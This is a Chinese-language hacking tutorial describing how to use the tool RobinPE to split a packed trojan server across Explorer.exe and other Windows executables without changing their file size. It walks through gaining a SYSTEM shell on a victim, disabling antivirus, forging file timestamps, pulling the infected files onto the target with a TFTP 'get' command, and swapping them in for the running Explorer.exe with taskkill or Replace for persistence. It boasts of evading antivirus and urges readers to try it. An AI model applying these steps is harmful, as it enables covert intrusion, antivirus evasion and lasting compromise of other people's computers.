见缝插针 伪造木马——RobinPE

    将木马后门与图片或程序伪装捆绑在一起，诱使别人打开图片或执行程序，从而在后台悄悄运行木马后门，这是一种常见的木马植入手段。图片木马制造机、EXEBind等，各种各样木马捆绑合并工具大家都见得很多了，使用这些木马捆绑工具虽然可以有效地对木马进行伪装，但是面对嗅觉灵敏的杀毒软件和警惕性安全性日趋提高的上网者来说，这些捆绑工具难免会暴露一些缺点。比如，宿主文件大小在捆绑木马后会发生变化，对于一些体积较大的木马，捆绑后的文件体积变化尤其明显，稍微细心些的用户就很容易识破这种捆绑手段。

有没有隐藏性更高一些的木马捆绑工具呢？是否可以在捆绑了木马后让宿主文件体积不发生变化呢？最新的木马后门植入工具RobinPE，可以将后门文件藏匿在任意的EXE程序文件中，以后每次正常启动程序文件时，我们植入的文件就会悄悄的生成并执行，最重要的是植入木马后宿主文件的大小基本不发生变化。下面就以笔者的使用经历为例，向大家介绍一下这个工具的使用吧！

 

一、准备植入木马

首先是利用系统漏洞，溢出得到了一台主机Local System权限的Shell，然后克隆管理员帐号，清除了杀毒软件之类的文件上传障碍。其具体过程就不再详述了，下面主要是讲述如何将木马植入Explorer.exe进程中，再将其上传到远程主机上执行并进行控制。

首先需要在本地将木马植入Explorer.exe文件中，这里我们使用一个叫作“Fuck Trojan”的木马，并将对服务端程序“Server.exe”加壳处理以躲过杀毒软件的查杀。备份“Explorer.exe”文件，然后运行工具RobinPE。

二、计算空间——木马植入前的关键

使用RobinPE在正常程序中植入木马后，有一个特点就是程序将保护原来的体积大小不发生变化，从而不易被查觉。其原理就是在植入前先执行计算程序文件可利用的空间，将后门木马植入缝隙而不额外增加代码区块，因此文件的大小不会发生变化。在植入程序前，首先需要计算程序可利用空间，根据计算后得到的结果才能确定可否植入。

打开RobinPE后，点击界面右下角处的“整体植入”按钮，在“后门文件”项中点击浏览选择刚才的木马服务端文件“Server.exe”；然后在“整体植入”中浏览选择备份的“Explorer.exe”文件（如图1）。点击“计算空间”按钮，即可开始计算宿主文件“Explorer.exe”中剩余的空间，对比木马文件“Server.exe”的大小，判断是否可以将文件植入宿主文件中。从最后的计算结果中我们可以看到，木马文件共有“177664”字节，而宿主文件中仅剩下了26531个字节空间，因此该木马显得太大，不能植入Explorer.exe文件中（如图2）。

 

图1

图2

 

三、化整为零，分体植入法

怎么办呢？可以换一个体积较小的木马服务端文件，或者更换宿主文件。不过我选的这个木马感觉比较好用，而且不易被查杀，同时Explorer.exe又是一个最佳的木马后门藏身之所，每次系统启动都必须运行这个进程，从而保障了木马能可靠地被执行，因此我打算使用RobinPE的另一种木马植入方法。

刚才使用的“整体植入”，是将木马文件全部植入一个EXE文件之中；而分体植入则是将一个文件拆解植入到多个文件里，这样就保证了木马文件有足够的存放空间。

1.设置多个宿主文件

点击界面右下角的“分体植入”按钮，切换到分体植入界面中（如图3）。在“分解植入”项中点击“添加”按钮，添加多个宿主文件到中间的列表框中。添加完毕后，点击“计算空间”即可计算所有宿主文件总的剩余空间，对比木马文件大小以判断是否能够植入。可以选择添加8个宿主文件，要求所有宿主文件都位于同一目录中，并且在植入后不能将宿主文件随意改名。在这里选择了与Explorer.EXE位于同一目录下的“hh.exe”、“winhelp.exe”等几个文件。

 

图3

小提示：为了不破坏本地的程序文件，可将这几个宿主文件复制备份到另一文件夹下进行。

 

2.设置启动文件

在宿主文件列表框中，选择其中一个宿主文件“Explorer.exe”，然后点击右边的“设为启动”，此宿主文件将被作为主启动文件。木马文件还原代码和数据表都将植入到这个文件中，以后只要运行宿主文件，该文件就会自动将分解在各宿主文件中的木马组合还原成完整的程序，并自动执行。

设置完毕后，点击“开始植入”按钮，即可开始将木马服务端程序“Server.exe”文件分解植入到“Explorer.exe”等几个文件中了。

3.修改文件时间

由于植入木马后，启动文件和宿主文件的文件创建和修改日期会发生变化，因此我们需要将文件时间修改恢复原样。在RobinPE中自带了一个叫作“时空机器”的工具，可以修改文件的时间和日期。在文件框中浏览输入文件路径和文件名，然后在界面下方设置程序文件的创建时间和修改时间，最后点击“确认修改”即可（如图4）。

 

图4

四、上传木马文件

先在本地用金山和瑞星杀毒软件扫描一下被植入木马的启动文件和几个宿主文件，扫描结果未提示有病毒。本来嘛，病毒已经加过壳而且现在被分解了，怎么可能查得出来呢？

现在用TFTPD32.exe在本地建立了一个TFTP服务器（如图5），在远程目标主机的Shell中输入如下命令：“tftp -i 本机IP get 上传文件”，将所有植入木马的文件上传到目标主机的任意目录下。

 

图5

 

五、运行木马

现在需要将上传的文件全部复制到对方的“System”目录下，其中除了宿主文件“Explorer.exe”文件外，其它文件都可以直接复制过去。而“Explorer.exe”文件由于正在运行中，因此无法通过复制替换掉。可以采用两种方法：

1.使用“taskkill”命令杀掉“Explorer.exe”进程，输入命令格式如下：“taskkill /F /IM Explorer.exe”。然后再将上传的Explorer.exe文件复制到“System”目录下，运行“explorer”重新运行此命令，木马就在后台悄悄运行了。

2.使用Windows中的“Replace”命令，此命令可以替换掉正在运行中的程序和文件。如图6所示在目标主机Shell中输入命令“Replace c:\windows\system\Explorer.exe c:\temp\”（这里假设“Explorer.exe”上传在c:\temp文件夹下。），就可以用上传的“Explorer.exe”文件替换掉正在运行的程序文件了。重启系统以后，木马就会随“Explorer.exe”自动运行了。

 

图6

 

看了上面的方法，大家是不是感觉到又有了一种新思路？将木马分体植入几个文件中，不改变文件的大小，可以有效的躲过查杀；而替换掉系统必调用的程序，使得每次系统启动都会自动运行我们的木马，比将木马添加到注册表启动键值中或放入系统启动程序组中要隐蔽得多了。为植入木马犯愁的朋友不妨可以试一试这个方法。